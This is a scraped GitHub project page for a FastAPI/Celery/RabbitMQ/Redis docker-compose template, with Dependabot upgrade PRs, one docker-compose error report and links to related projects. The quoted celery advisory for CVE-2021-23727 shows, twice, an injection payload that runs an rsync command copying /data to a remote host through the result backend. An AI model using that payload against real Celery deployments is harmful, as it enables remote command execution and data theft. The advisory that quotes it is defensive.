A simple docker-compose app for orchestrating a fastapi application, a celery queue with rabbitmq(broker) and redis(backend)

Related tags

FastAPI Projects redis rabbitmq docker-compose celery fastapi
Overview

fastapi - celery - rabbitmq - redis -> Docker

A simple docker-compose app for orchestrating a fastapi application, a celery queue with rabbitmq(broker) and redis(backend)

build and run containers

docker-compose up -d --build

This will expose fastapi application on 5000 and celery flower on 5555

swagger docs - http://localhost:5000/

redoc - http://localhost:5000/redoc

celery flower - http://localhost:5555

Comments
  • Bump celery from 4.4.6 to 5.2.2

    Bump celery from 4.4.6 to 5.2.2

    Bumps celery from 4.4.6 to 5.2.2.

    Release notes

    Sourced from celery's releases.

    5.2.2

    Release date: 2021-12-26 16:30 P.M UTC+2:00

    Release by: Omer Katz

    • Various documentation fixes.

    • Fix CVE-2021-23727 (Stored Command Injection security vulnerability).

      When a task fails, the failure information is serialized in the backend. In some cases, the exception class is only importable from the consumer's code base. In this case, we reconstruct the exception class so that we can re-raise the error on the process which queried the task's result. This was introduced in #4836. If the recreated exception type isn't an exception, this is a security issue. Without the condition included in this patch, an attacker could inject a remote code execution instruction such as: os.system("rsync /data [email protected]:~/data") by setting the task's result to a failure in the result backend with the os, the system function as the exception type and the payload rsync /data [email protected]:~/data as the exception arguments like so:

      {
      "exc_module": "os",
      'exc_type': "system",
      "exc_message": "rsync /data [email protected]:~/data"
}

      According to my analysis, this vulnerability can only be exploited if the producer delayed a task which runs long enough for the attacker to change the result mid-flight, and the producer has polled for the task's result. The attacker would also have to gain access to the result backend. The severity of this security vulnerability is low, but we still recommend upgrading.

    v5.2.1

    Release date: 2021-11-16 8.55 P.M UTC+6:00

    Release by: Asif Saif Uddin

    • Fix rstrip usage on bytes instance in ProxyLogger.
    • Pass logfile to ExecStop in celery.service example systemd file.
    • fix: reduce latency of AsyncResult.get under gevent (#7052)
    • Limit redis version: <4.0.0.
    • Bump min kombu version to 5.2.2.
    • Change pytz>dev to a PEP 440 compliant pytz>0.dev.0.

    ... (truncated)

    Changelog

    Sourced from celery's changelog.

    5.2.2

    :release-date: 2021-12-26 16:30 P.M UTC+2:00 :release-by: Omer Katz

    • Various documentation fixes.

    • Fix CVE-2021-23727 (Stored Command Injection security vulnerability).

      When a task fails, the failure information is serialized in the backend. In some cases, the exception class is only importable from the consumer's code base. In this case, we reconstruct the exception class so that we can re-raise the error on the process which queried the task's result. This was introduced in #4836. If the recreated exception type isn't an exception, this is a security issue. Without the condition included in this patch, an attacker could inject a remote code execution instruction such as: os.system("rsync /data [email protected]:~/data") by setting the task's result to a failure in the result backend with the os, the system function as the exception type and the payload rsync /data [email protected]:~/data as the exception arguments like so:

      .. code-block:: python

        {
        "exc_module": "os",
        'exc_type': "system",
        "exc_message": "rsync /data [email protected]:~/data"
  }

      According to my analysis, this vulnerability can only be exploited if the producer delayed a task which runs long enough for the attacker to change the result mid-flight, and the producer has polled for the task's result. The attacker would also have to gain access to the result backend. The severity of this security vulnerability is low, but we still recommend upgrading.

    .. _version-5.2.1:

    5.2.1

    :release-date: 2021-11-16 8.55 P.M UTC+6:00 :release-by: Asif Saif Uddin

    • Fix rstrip usage on bytes instance in ProxyLogger.
    • Pass logfile to ExecStop in celery.service example systemd file.
    • fix: reduce latency of AsyncResult.get under gevent (#7052)
    • Limit redis version: <4.0.0.
    • Bump min kombu version to 5.2.2.

    ... (truncated)

    Commits

    Dependabot compatibility score

    Dependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting @dependabot rebase.

    Dependabot commands and options

    You can trigger Dependabot actions by commenting on this PR:

    • @dependabot rebase will rebase this PR
    • @dependabot recreate will recreate this PR, overwriting any edits that have been made to it
    • @dependabot merge will merge this PR after your CI passes on it
    • @dependabot squash and merge will squash and merge this PR after your CI passes on it
    • @dependabot cancel merge will cancel a previously requested merge and block automerging
    • @dependabot reopen will reopen this PR if it is closed
    • @dependabot close will close this PR and stop Dependabot recreating it. You can achieve the same result by closing it manually
    • @dependabot ignore this major version will close this PR and stop Dependabot creating any more for this major version (unless you reopen the PR or upgrade to it yourself)
    • @dependabot ignore this minor version will close this PR and stop Dependabot creating any more for this minor version (unless you reopen the PR or upgrade to it yourself)
    • @dependabot ignore this dependency will close this PR and stop Dependabot creating any more for this dependency (unless you reopen the PR or upgrade to it yourself)
    • @dependabot use these labels will set the current labels as the default for future PRs for this repo and language
    • @dependabot use these reviewers will set the current reviewers as the default for future PRs for this repo and language
    • @dependabot use these assignees will set the current assignees as the default for future PRs for this repo and language
    • @dependabot use this milestone will set the current milestone as the default for future PRs for this repo and language

    You can disable automated security fix PRs for this repo from the Security Alerts page.

    dependencies 
    opened by dependabot[bot] 0
  • docker-compose up --build Don't work

    docker-compose up --build Don't work 

    $docker-compose up --build
Starting fastapi-celery-redis-rabbitmq_krabbitmq_1 ... done
Starting fastapi-celery-redis-rabbitmq_kredis_1    ... done
Starting fastapi-celery-redis-rabbitmq_worker_1    ... done
Starting fastapi-celery-redis-rabbitmq_flower_1    ... done
Starting fastapi-celery-redis-rabbitmq_api_1       ... done
Attaching to fastapi-celery-redis-rabbitmq_kredis_1, fastapi-celery-redis-rabbitmq_krabbitmq_1, fastapi-celery-redis-rabbitmq_worker_1, fastapi-celery-redis-rabbitmq_flower_1, fastapi-celery-redis-rabbitmq_api_1
krabbitmq_1  | error: RABBITMQ_DEFAULT_PASS is set but deprecated
krabbitmq_1  | error: RABBITMQ_DEFAULT_USER is set but deprecated
krabbitmq_1  | error: deprecated environment variables detected
krabbitmq_1  | 
krabbitmq_1  | Please use a configuration file instead; visit https://www.rabbitmq.com/configure.html to learn more
krabbitmq_1  | 
fastapi-celery-redis-rabbitmq_krabbitmq_1 exited with code 1
kredis_1     | 1:C 17 Aug 2021 16:31:19.286 # oO0OoO0OoO0Oo Redis is starting oO0OoO0OoO0Oo
kredis_1     | 1:C 17 Aug 2021 16:31:19.286 # Redis version=6.2.5, bits=64, commit=00000000, modified=0, pid=1, just started
kredis_1     | 1:C 17 Aug 2021 16:31:19.286 # Warning: no config file specified, using the default config. In order to specify a config file use redis-server /path/to/redis.conf
kredis_1     | 1:M 17 Aug 2021 16:31:19.288 * Increased maximum number of open files to 10032 (it was originally set to 1024).
kredis_1     | 1:M 17 Aug 2021 16:31:19.288 * monotonic clock: POSIX clock_gettime
kredis_1     | 1:M 17 Aug 2021 16:31:19.292 * Running mode=standalone, port=6379.
kredis_1     | 1:M 17 Aug 2021 16:31:19.292 # WARNING: The TCP backlog setting of 511 cannot be enforced because /proc/sys/net/core/somaxconn is set to the lower value of 128.
kredis_1     | 1:M 17 Aug 2021 16:31:19.292 # Server initialized
kredis_1     | 1:M 17 Aug 2021 16:31:19.292 # WARNING overcommit_memory is set to 0! Background save may fail under low memory condition. To fix this issue add 'vm.overcommit_memory = 1' to /etc/sysctl.conf and then reboot or run the command 'sysctl vm.overcommit_memory=1' for this to take effect.
kredis_1     | 1:M 17 Aug 2021 16:31:19.293 * Loading RDB produced by version 6.2.5
kredis_1     | 1:M 17 Aug 2021 16:31:19.293 * RDB age 1116 seconds
kredis_1     | 1:M 17 Aug 2021 16:31:19.293 * RDB memory usage when created 0.77 Mb
kredis_1     | 1:M 17 Aug 2021 16:31:19.293 * DB loaded from disk: 0.001 seconds
kredis_1     | 1:M 17 Aug 2021 16:31:19.293 * Ready to accept connections
flower_1     | [I 210817 16:31:24 command:138] Visit me at http://localhost:5555
flower_1     | [I 210817 16:31:24 command:145] Broker: amqp://guest:**@krabbitmq:5672//
api_1        | [2021-08-17 16:31:24 +0000] [6] [INFO] Starting gunicorn 20.0.4
api_1        | [2021-08-17 16:31:24 +0000] [6] [INFO] Listening at: http://0.0.0.0:5000 (6)
api_1        | [2021-08-17 16:31:24 +0000] [6] [INFO] Using worker: uvicorn.workers.UvicornWorker
flower_1     | [I 210817 16:31:24 command:146] Registered tasks: 
flower_1     |     ['celery.accumulate',
flower_1     |      'celery.backend_cleanup',
flower_1     |      'celery.chain',
flower_1     |      'celery.chord',
flower_1     |      'celery.chord_unlock',
flower_1     |      'celery.chunks',
flower_1     |      'celery.group',
flower_1     |      'celery.map',
flower_1     |      'celery.starmap',
flower_1     |      'shopping.celery.tasks.move_to_next_stage']
api_1        | [2021-08-17 16:31:24 +0000] [8] [INFO] Booting worker with pid: 8
api_1        | [2021-08-17 16:31:24 +0000] [9] [INFO] Booting worker with pid: 9
api_1        | [2021-08-17 16:31:24 +0000] [10] [INFO] Booting worker with pid: 10
api_1        | [2021-08-17 16:31:24 +0000] [11] [INFO] Booting worker with pid: 11
worker_1     | /usr/local/lib/python3.8/site-packages/celery/platforms.py:800: RuntimeWarning: You're running the worker with superuser privileges: this is
worker_1     | absolutely not recommended!
worker_1     | 
worker_1     | Please specify a different user using the --uid option.
worker_1     | 
worker_1     | User information: uid=0 euid=0 gid=0 egid=0
worker_1     | 
worker_1     |   warnings.warn(RuntimeWarning(ROOT_DISCOURAGED.format(
worker_1     | [2021-08-17 16:31:24,653: ERROR/MainProcess] consumer: Cannot connect to amqp://guest:**@krabbitmq:5672//: failed to resolve broker hostname.
worker_1     | Trying again in 2.00 seconds... (1/100)
worker_1     | 
api_1        | [2021-08-17 16:31:25 +0000] [10] [INFO] Started server process [10]
api_1        | [2021-08-17 16:31:25 +0000] [11] [INFO] Started server process [11]
api_1        | [2021-08-17 16:31:25 +0000] [10] [INFO] Waiting for application startup.
api_1        | [2021-08-17 16:31:25 +0000] [11] [INFO] Waiting for application startup.
api_1        | [2021-08-17 16:31:25 +0000] [11] [INFO] Application startup complete.
api_1        | [2021-08-17 16:31:25 +0000] [10] [INFO] Application startup complete.
api_1        | [2021-08-17 16:31:25 +0000] [9] [INFO] Started server process [9]
api_1        | [2021-08-17 16:31:25 +0000] [9] [INFO] Waiting for application startup.
api_1        | [2021-08-17 16:31:25 +0000] [9] [INFO] Application startup complete.
api_1        | [2021-08-17 16:31:25 +0000] [8] [INFO] Started server process [8]
api_1        | [2021-08-17 16:31:25 +0000] [8] [INFO] Waiting for application startup.
api_1        | [2021-08-17 16:31:25 +0000] [8] [INFO] Application startup complete.
worker_1     | [2021-08-17 16:31:26,829: ERROR/MainProcess] consumer: Cannot connect to amqp://guest:**@krabbitmq:5672//: failed to resolve broker hostname.
worker_1     | Trying again in 4.00 seconds... (2/100)
worker_1     | 
worker_1     | [2021-08-17 16:31:30,999: ERROR/MainProcess] consumer: Cannot connect to amqp://guest:**@krabbitmq:5672//: failed to resolve broker hostname.
worker_1     | Trying again in 6.00 seconds... (3/100)
worker_1     | 
^CGracefully stopping... (press Ctrl+C again to force)
Stopping fastapi-celery-redis-rabbitmq_api_1       ... done
Stopping fastapi-celery-redis-rabbitmq_flower_1    ... done
Stopping fastapi-celery-redis-rabbitmq_worker_1    ... done
Stopping fastapi-celery-redis-rabbitmq_kredis_1    ... done

    Any suggestions?

    opened by ingluisandres 0
  • Bump websockets from 8.1 to 9.1

    Bump websockets from 8.1 to 9.1

    Bumps websockets from 8.1 to 9.1.

    Changelog

    Sourced from websockets's changelog.

    9.1 ...

    May 27, 2021

    .. note::

    **Version 9.1 fixes a security issue introduced in version 8.0.**

    Version 8.0 was vulnerable to timing attacks on HTTP Basic Auth passwords.

    9.0.2 .....

    May 15, 2021

    • Restored compatibility of python -m websockets with Python < 3.9.

    • Restored compatibility with mypy.

    9.0.1 .....

    May 2, 2021

    • Fixed issues with the packaging of the 9.0 release.

    9.0 ...

    May 1, 2021

    .. note::

    **Version 9.0 moves or deprecates several APIs.**

    Aliases provide backwards compatibility for all previously public APIs.
    

      

    • 

      :class:~datastructures.Headers and
:exc:~datastructures.MultipleValuesError were moved from
websockets.http to :mod:websockets.datastructures. If you're using
them, you should adjust the import path.
      

      • 

    • 

      The client, server, protocol, and auth modules were
moved from the websockets package to websockets.legacy
sub-package, as part of an upcoming refactoring. Despite the name,
they're still fully supported. The refactoring should be a transparent
upgrade for most uses when it's available. The legacy implementation
will be preserved according to the backwards-compatibility policy_.

... (truncated)

Commits
  • d0f3288 Bump version number.
  • 547a26b Use constant-time comparison for passwords.
  • a14226a Bump version number.
  • 8900c13 Add mypy to dictionary.
  • 0713dbf Add test coverage.
  • b99c4fe Restore real imports for compatibility with mypy.
  • e44e085 Use relative imports everywhere, for consistency.
  • 70fadbf Restore compatibility with Python < 3.9.
  • 217ac2d Fix broken link.
  • fc176f4 Bump version number.
  • Additional commits viewable in compare view

Dependabot compatibility score

Dependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting @dependabot rebase.

Dependabot commands and options

You can trigger Dependabot actions by commenting on this PR:

  • @dependabot rebase will rebase this PR
  • @dependabot recreate will recreate this PR, overwriting any edits that have been made to it
  • @dependabot merge will merge this PR after your CI passes on it
  • @dependabot squash and merge will squash and merge this PR after your CI passes on it
  • @dependabot cancel merge will cancel a previously requested merge and block automerging
  • @dependabot reopen will reopen this PR if it is closed
  • @dependabot close will close this PR and stop Dependabot recreating it. You can achieve the same result by closing it manually
  • @dependabot ignore this major version will close this PR and stop Dependabot creating any more for this major version (unless you reopen the PR or upgrade to it yourself)
  • @dependabot ignore this minor version will close this PR and stop Dependabot creating any more for this minor version (unless you reopen the PR or upgrade to it yourself)
  • @dependabot ignore this dependency will close this PR and stop Dependabot creating any more for this dependency (unless you reopen the PR or upgrade to it yourself)
  • @dependabot use these labels will set the current labels as the default for future PRs for this repo and language
  • @dependabot use these reviewers will set the current reviewers as the default for future PRs for this repo and language
  • @dependabot use these assignees will set the current assignees as the default for future PRs for this repo and language
  • @dependabot use this milestone will set the current milestone as the default for future PRs for this repo and language

You can disable automated security fix PRs for this repo from the Security Alerts page.

dependencies 
opened by dependabot[bot] 0
  • Bump fastapi from 0.58.1 to 0.65.2

    Bump fastapi from 0.58.1 to 0.65.2

    Bumps fastapi from 0.58.1 to 0.65.2.

    Release notes

    Sourced from fastapi's releases.

    0.65.2

    Security fixes

    This change fixes a CSRF security vulnerability when using cookies for authentication in path operations with JSON payloads sent by browsers.

    In versions lower than 0.65.2, FastAPI would try to read the request payload as JSON even if the content-type header sent was not set to application/json or a compatible JSON media type (e.g. application/geo+json).

    So, a request with a content type of text/plain containing JSON data would be accepted and the JSON data would be extracted.

    But requests with content type text/plain are exempt from CORS preflights, for being considered Simple requests. So, the browser would execute them right away including cookies, and the text content could be a JSON string that would be parsed and accepted by the FastAPI application.

    See CVE-2021-32677 for more details.

    Thanks to Dima Boger for the security report! 🙇🔒

    Internal

    0.65.1

    Security fixes

    0.65.0

    Breaking Changes - Upgrade

    • ⬆️ Upgrade Starlette to 0.14.2, including internal UJSONResponse migrated from Starlette. This includes several bug fixes and features from Starlette. PR #2335 by @​hanneskuettner.

    Translations

    Internal

    0.64.0

    Features

    ... (truncated)

    Commits

    Dependabot compatibility score

    Dependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting @dependabot rebase.

    Dependabot commands and options

    You can trigger Dependabot actions by commenting on this PR:

    • @dependabot rebase will rebase this PR
    • @dependabot recreate will recreate this PR, overwriting any edits that have been made to it
    • @dependabot merge will merge this PR after your CI passes on it
    • @dependabot squash and merge will squash and merge this PR after your CI passes on it
    • @dependabot cancel merge will cancel a previously requested merge and block automerging
    • @dependabot reopen will reopen this PR if it is closed
    • @dependabot close will close this PR and stop Dependabot recreating it. You can achieve the same result by closing it manually
    • @dependabot ignore this major version will close this PR and stop Dependabot creating any more for this major version (unless you reopen the PR or upgrade to it yourself)
    • @dependabot ignore this minor version will close this PR and stop Dependabot creating any more for this minor version (unless you reopen the PR or upgrade to it yourself)
    • @dependabot ignore this dependency will close this PR and stop Dependabot creating any more for this dependency (unless you reopen the PR or upgrade to it yourself)
    • @dependabot use these labels will set the current labels as the default for future PRs for this repo and language
    • @dependabot use these reviewers will set the current reviewers as the default for future PRs for this repo and language
    • @dependabot use these assignees will set the current assignees as the default for future PRs for this repo and language
    • @dependabot use this milestone will set the current milestone as the default for future PRs for this repo and language

    You can disable automated security fix PRs for this repo from the Security Alerts page.

    dependencies 
    opened by dependabot[bot] 0
  • Bump pydantic from 1.5.1 to 1.6.2

    Bump pydantic from 1.5.1 to 1.6.2

    Bumps pydantic from 1.5.1 to 1.6.2.

    Release notes

    Sourced from pydantic's releases.

    v1.6.2 (2021-05-11)

    Security fix: Fix date and datetime parsing so passing either 'infinity' or float('inf') (or their negative values) does not cause an infinite loop, see security advisory CVE-2021-29510.

    v1.6.1 (2020-07-15)

    See Changelog.

    Thank you to pydantic's sponsors: @​matin, @​tiangolo, @​chdsbd, @​jorgecarleitao, and 1 anonymous sponsor for their kind support.

    changes:

    v1.6 (2020-07-11)

    See Changelog.

    Thank you to pydantic's sponsors: @​matin, @​tiangolo, @​chdsbd, @​jorgecarleitao, and 1 anonymous sponsor for their kind support.

    changes:

    • Modify validators for conlist and conset to not have always=True, #1682 by @​samuelcolvin
    • add port check to AnyUrl (can't exceed 65536) ports are 16 insigned bits: 0 <= port <= 2**16-1 src: rfc793 header format, #1654 by @​flapili
    • Document default regex anchoring semantics, #1648 by @​yurikhan
    • Use chain.from_iterable in class_validators.py. This is a faster and more idiomatic way of using itertools.chain. Instead of computing all the items in the iterable and storing them in memory, they are computed one-by-one and never stored as a huge list. This can save on both runtime and memory space, #1642 by @​cool-RR
    • Add conset(), analogous to conlist(), #1623 by @​patrickkwang
    • make pydantic errors (un)pickable, #1616 by @​PrettyWood
    • Allow custom encoding for dotenv files, #1615 by @​PrettyWood
    • Ensure SchemaExtraCallable is always defined to get type hints on BaseConfig, #1614 by @​PrettyWood
    • Update datetime parser to support negative timestamps, #1600 by @​mlbiche
    • Update mypy, remove AnyType alias for Type[Any], #1598 by @​samuelcolvin
    • Adjust handling of root validators so that errors are aggregated from all failing root validators, instead of reporting on only the first root validator to fail, #1586 by @​beezee
    • Make __modify_schema__ on Enums apply to the enum schema rather than fields that use the enum, #1581 by @​therefromhere
    • Fix behavior of __all__ key when used in conjunction with index keys in advanced include/exclude of fields that are sequences, #1579 by @​xspirus
    • Subclass validators do not run when referencing a List field defined in a parent class when each_item=True. Added an example to the docs illustrating this, #1566 by @​samueldeklund
    • change schema.field_class_to_schema to support frozenset in schema, #1557 by @​wangpeibao
    • Call __modify_schema__ only for the field schema, #1552 by @​PrettyWood
    • Move the assignment of field.validate_always in fields.py so the always parameter of validators work on inheritance, #1545 by @​dcHHH
    • Added support for UUID instantiation through 16 byte strings such as b'\x12\x34\x56\x78' * 4. This was done to support BINARY(16) columns in sqlalchemy, #1541 by @​shawnwall
    • Add a test assertion that default_factory can return a singleton, #1523 by @​therefromhere
    • Add NameEmail.__eq__ so duplicate NameEmail instances are evaluated as equal, #1514 by @​stephen-bunn
    • Add datamodel-code-generator link in pydantic document site, #1500 by @​koxudaxi
    • Added a "Discussion of Pydantic" section to the documentation, with a link to "Pydantic Introduction" video by Alexander Hultnér, #1499 by @​hultner
    • Avoid some side effects of default_factory by calling it only once if possible and by not setting a default value in the schema, #1491 by @​PrettyWood
    • Added docs about dumping dataclasses to JSON, #1487 by @​mikegrima
    • Make BaseModel.__signature__ class-only, so getting __signature__ from model instance will raise AttributeError, #1466 by @​MrMrRobat
    • include 'format': 'password' in the schema for secret types, #1424 by @​atheuz
    • Modify schema constraints on ConstrainedFloat so that exclusiveMinimum and minimum are not included in the schema if they are equal to -math.inf and exclusiveMaximum and maximum are not included if they are equal to math.inf, #1417 by @​vdwees
    • Squash internal __root__ dicts in .dict() (and, by extension, in .json()), #1414 by @​patrickkwang

    ... (truncated)

    Changelog

    Sourced from pydantic's changelog.

    v1.6.2 (2021-05-11)

    • Security fix: Fix date and datetime parsing so passing either 'infinity' or float('inf') (or their negative values) does not cause an infinite loop, See security advisory CVE-2021-29510

    v1.6.1 (2020-07-15)

    v1.6 (2020-07-11)

    Thank you to pydantic's sponsors: @​matin, @​tiangolo, @​chdsbd, @​jorgecarleitao, and 1 anonymous sponsor for their kind support.

    • Modify validators for conlist and conset to not have always=True, #1682 by @​samuelcolvin
    • add port check to AnyUrl (can't exceed 65536) ports are 16 insigned bits: 0 <= port <= 2**16-1 src: rfc793 header format, #1654 by @​flapili
    • Document default regex anchoring semantics, #1648 by @​yurikhan
    • Use chain.from_iterable in class_validators.py. This is a faster and more idiomatic way of using itertools.chain. Instead of computing all the items in the iterable and storing them in memory, they are computed one-by-one and never stored as a huge list. This can save on both runtime and memory space, #1642 by @​cool-RR
    • Add conset(), analogous to conlist(), #1623 by @​patrickkwang
    • make pydantic errors (un)pickable, #1616 by @​PrettyWood
    • Allow custom encoding for dotenv files, #1615 by @​PrettyWood
    • Ensure SchemaExtraCallable is always defined to get type hints on BaseConfig, #1614 by @​PrettyWood
    • Update datetime parser to support negative timestamps, #1600 by @​mlbiche
    • Update mypy, remove AnyType alias for Type[Any], #1598 by @​samuelcolvin
    • Adjust handling of root validators so that errors are aggregated from all failing root validators, instead of reporting on only the first root validator to fail, #1586 by @​beezee
    • Make __modify_schema__ on Enums apply to the enum schema rather than fields that use the enum, #1581 by @​therefromhere
    • Fix behavior of __all__ key when used in conjunction with index keys in advanced include/exclude of fields that are sequences, #1579 by @​xspirus
    • Subclass validators do not run when referencing a List field defined in a parent class when each_item=True. Added an example to the docs illustrating this, #1566 by @​samueldeklund
    • change schema.field_class_to_schema to support frozenset in schema, #1557 by @​wangpeibao
    • Call __modify_schema__ only for the field schema, #1552 by @​PrettyWood
    • Move the assignment of field.validate_always in fields.py so the always parameter of validators work on inheritance, #1545 by @​dcHHH
    • Added support for UUID instantiation through 16 byte strings such as b'\x12\x34\x56\x78' * 4. This was done to support BINARY(16) columns in sqlalchemy, #1541 by @​shawnwall
    • Add a test assertion that default_factory can return a singleton, #1523 by @​therefromhere
    • Add NameEmail.__eq__ so duplicate NameEmail instances are evaluated as equal, #1514 by @​stephen-bunn
    • Add datamodel-code-generator link in pydantic document site, #1500 by @​koxudaxi
    • Added a "Discussion of Pydantic" section to the documentation, with a link to "Pydantic Introduction" video by Alexander Hultnér, #1499 by @​hultner
    • Avoid some side effects of default_factory by calling it only once if possible and by not setting a default value in the schema, #1491 by @​PrettyWood
    • Added docs about dumping dataclasses to JSON, #1487 by @​mikegrima
    • Make BaseModel.__signature__ class-only, so getting __signature__ from model instance will raise AttributeError, #1466 by @​MrMrRobat
    • include 'format': 'password' in the schema for secret types, #1424 by @​atheuz
    • Modify schema constraints on ConstrainedFloat so that exclusiveMinimum and minimum are not included in the schema if they are equal to -math.inf and exclusiveMaximum and maximum are not included if they are equal to math.inf, #1417 by @​vdwees
    • Squash internal __root__ dicts in .dict() (and, by extension, in .json()), #1414 by @​patrickkwang
    • Move const validator to post-validators so it validates the parsed value, #1410 by @​selimb
    • Fix model validation to handle nested literals, e.g. Literal['foo', Literal['bar']], #1364 by @​DBCerigo
    • Remove user_required = True from RedisDsn, neither user nor password are required, #1275 by @​samuelcolvin

    ... (truncated)

    Commits

    Dependabot compatibility score

    Dependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting @dependabot rebase.

    Dependabot commands and options

    You can trigger Dependabot actions by commenting on this PR:

    • @dependabot rebase will rebase this PR
    • @dependabot recreate will recreate this PR, overwriting any edits that have been made to it
    • @dependabot merge will merge this PR after your CI passes on it
    • @dependabot squash and merge will squash and merge this PR after your CI passes on it
    • @dependabot cancel merge will cancel a previously requested merge and block automerging
    • @dependabot reopen will reopen this PR if it is closed
    • @dependabot close will close this PR and stop Dependabot recreating it. You can achieve the same result by closing it manually
    • @dependabot ignore this major version will close this PR and stop Dependabot creating any more for this major version (unless you reopen the PR or upgrade to it yourself)
    • @dependabot ignore this minor version will close this PR and stop Dependabot creating any more for this minor version (unless you reopen the PR or upgrade to it yourself)
    • @dependabot ignore this dependency will close this PR and stop Dependabot creating any more for this dependency (unless you reopen the PR or upgrade to it yourself)
    • @dependabot use these labels will set the current labels as the default for future PRs for this repo and language
    • @dependabot use these reviewers will set the current reviewers as the default for future PRs for this repo and language
    • @dependabot use these assignees will set the current assignees as the default for future PRs for this repo and language
    • @dependabot use this milestone will set the current milestone as the default for future PRs for this repo and language

    You can disable automated security fix PRs for this repo from the Security Alerts page.

    dependencies 
    opened by dependabot[bot] 0
  • Bump uvicorn from 0.11.5 to 0.11.7

    Bump uvicorn from 0.11.5 to 0.11.7

    Bumps uvicorn from 0.11.5 to 0.11.7.

    Release notes

    Sourced from uvicorn's releases.

    Version 0.11.7

    0.11.7

    • SECURITY FIX: Prevent sending invalid HTTP header names and values.
    • SECURITY FIX: Ensure path value is escaped before logging to the console.

    Version 0.11.6

    • Fix overriding the root logger.
    Changelog

    Sourced from uvicorn's changelog.

    0.11.7

    • SECURITY FIX: Prevent sending invalid HTTP header names and values.
    • SECURITY FIX: Ensure path value is escaped before logging to the console.

    0.11.6

    • Fix overriding the root logger.
    Commits

    Dependabot compatibility score

    Dependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting @dependabot rebase.

    Dependabot commands and options

    You can trigger Dependabot actions by commenting on this PR:

    • @dependabot rebase will rebase this PR
    • @dependabot recreate will recreate this PR, overwriting any edits that have been made to it
    • @dependabot merge will merge this PR after your CI passes on it
    • @dependabot squash and merge will squash and merge this PR after your CI passes on it
    • @dependabot cancel merge will cancel a previously requested merge and block automerging
    • @dependabot reopen will reopen this PR if it is closed
    • @dependabot close will close this PR and stop Dependabot recreating it. You can achieve the same result by closing it manually
    • @dependabot ignore this major version will close this PR and stop Dependabot creating any more for this major version (unless you reopen the PR or upgrade to it yourself)
    • @dependabot ignore this minor version will close this PR and stop Dependabot creating any more for this minor version (unless you reopen the PR or upgrade to it yourself)
    • @dependabot ignore this dependency will close this PR and stop Dependabot creating any more for this dependency (unless you reopen the PR or upgrade to it yourself)
    • @dependabot use these labels will set the current labels as the default for future PRs for this repo and language
    • @dependabot use these reviewers will set the current reviewers as the default for future PRs for this repo and language
    • @dependabot use these assignees will set the current assignees as the default for future PRs for this repo and language
    • @dependabot use this milestone will set the current milestone as the default for future PRs for this repo and language

    You can disable automated security fix PRs for this repo from the Security Alerts page.

    dependencies 
    opened by dependabot[bot] 0
    • Owner
    Kartheekasasanka Kaipa
    Senior Backend Developer with expertise on Python, Java, Perl, Android
    Kartheekasasanka Kaipa
    GitHub
    Backend, modern REST API for obtaining match and odds data crawled from multiple sites. Using FastAPI, MongoDB as database, Motor as async MongoDB client, Scrapy as crawler and Docker.

    Introduction Apiestas is a project composed of a backend powered by the awesome framework FastAPI and a crawler powered by Scrapy. This project has fo

    Fran Lozano 54 Dec 13, 2022
    ReST based network device broker

    The Open API Platform for Network Devices netpalm makes it easy to push and pull state from your apps to your network by providing multiple southbound

    null 368 Dec 31, 2022
    基于Pytorch的脚手架项目,Celery+FastAPI+Gunicorn+Nginx+Supervisor实现服务部署,支持Docker发布

    cookiecutter-pytorch-fastapi 基于Pytorch的 脚手架项目 按规范添加推理函数即可实现Celery+FastAPI+Gunicorn+Nginx+Supervisor+Docker的快速部署 Requirements Python >= 3.6 with pip in

    null 17 Dec 23, 2022
    Backend Skeleton using FastAPI and Sqlalchemy ORM

    Backend API Skeleton Based on @tiangolo's full stack postgres template, with some things added, some things removed, and some things changed. This is

    David Montague 18 Oct 31, 2022
    Backend logic implementation for realworld with awesome FastAPI

    Backend logic implementation for realworld with awesome FastAPI

    Nik 2.2k Jan 8, 2023
    Deploy an inference API on AWS (EC2) using FastAPI Docker and Github Actions

    Deploy an inference API on AWS (EC2) using FastAPI Docker and Github Actions To learn more about this project: medium blog post The goal of this proje

    Ahmed BESBES 60 Dec 17, 2022
    Basic FastAPI starter with GraphQL, Docker, and MongoDB configurations.

    FastAPI + GraphQL Starter A python starter project using FastAPI and GraphQL. This project leverages docker for containerization and provides the scri

    Cloud Bytes Collection 1 Nov 24, 2022
    FastAPI Admin Dashboard based on FastAPI and Tortoise ORM.

    FastAPI ADMIN 中文文档 Introduction FastAPI-Admin is a admin dashboard based on fastapi and tortoise-orm. FastAPI-Admin provide crud feature out-of-the-bo

    long2ice 1.6k Dec 31, 2022
    Example app using FastAPI and JWT

    FastAPI-Auth Example app using FastAPI and JWT virtualenv -p python3 venv source venv/bin/activate pip3 install -r requirements.txt mv config.yaml.exa

    Sander 28 Oct 25, 2022
    FastAPI Skeleton App to serve machine learning models production-ready.

    FastAPI Model Server Skeleton Serving machine learning models production-ready, fast, easy and secure powered by the great FastAPI by Sebastián Ramíre

    null 268 Jan 1, 2023
    sample web application built with FastAPI + uvicorn

    SPARKY Sample web application built with FastAPI & Python 3.8 shows simple Flask-like structure with a Bootstrap template index.html also has a backgr

    mrx 21 Jan 3, 2022
    This is a FastAPI application that provides a RESTful API for the Podcasts from different podcast's RSS feeds

    The Podcaster API This is a FastAPI application that provides a RESTful API for the Podcasts from different podcast's RSS feeds. The API response is i

    Sagar Giri 2 Nov 7, 2021
    Example of integrating Poetry with Docker leveraging multi-stage builds.

    Poetry managed Python FastAPI application with Docker multi-stage builds This repo serves as a minimal reference on setting up docker multi-stage buil

    Michael Oliver 266 Dec 27, 2022
    The template for building scalable web APIs based on FastAPI, Tortoise ORM and other.

    FastAPI and Tortoise ORM. Powerful but simple template for web APIs w/ FastAPI (as web framework) and Tortoise-ORM (for working via database without h

    prostomarkeloff 95 Jan 8, 2023
    Ready-to-use and customizable users management for FastAPI

    FastAPI Users Ready-to-use and customizable users management for FastAPI Documentation: https://frankie567.github.io/fastapi-users/ Source Code: https

    François Voron 2.4k Jan 1, 2023
    TODO aplication made with Python's FastAPI framework and Hexagonal Architecture

    FastAPI Todolist Description Todolist aplication made with Python's FastAPI framework and Hexagonal Architecture. This is a test repository for the pu

    Giovanni Armane 91 Dec 31, 2022
